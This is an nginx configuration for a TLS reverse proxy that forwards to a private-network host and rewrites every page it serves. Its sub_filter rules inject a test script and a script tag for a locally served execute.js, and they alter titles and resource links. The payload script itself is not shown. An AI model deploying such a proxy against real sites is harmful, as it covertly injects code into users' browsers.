user nginx;
worker_processes auto;

error_log /var/log/nginx/error.log notice;
pid /var/run/nginx.pid;

events {
  worker_connections  1024;
}

http {
  server_tokens off;
  include /etc/nginx/mime.types;
  default_type  application/octet-stream;
  sendfile on;
  keepalive_timeout 65;

  server {
    listen 443 ssl http2;
    # listen 443 ssl;
    ssl_certificate /etc/ssl/certs/nginx.crt;
    ssl_certificate_key /etc/ssl/private/nginx.key;
    server_name $proxy_server;

    location / {
      sub_filter <title> '<title>updated-';
      sub_filter <head> '<head><script>console.log("test");</script>';
      sub_filter </head> '<script language="javascript" src="/scripts/execute.js"></script></head>';
      sub_filter 'src="' 'src="https://localhost/';
      proxy_set_header Accept-Encoding "";
      sub_filter_once off;

      proxy_ssl_name 192.168.10.2;
      proxy_set_header Connection keep-alive;
      proxy_ssl_server_name on;
      proxy_set_header Host 192.168.10.2;
      proxy_pass https://192.168.10.2;
    }

    location /scripts/ {
      root /usr/share/nginx/html/;
    }
  }
}
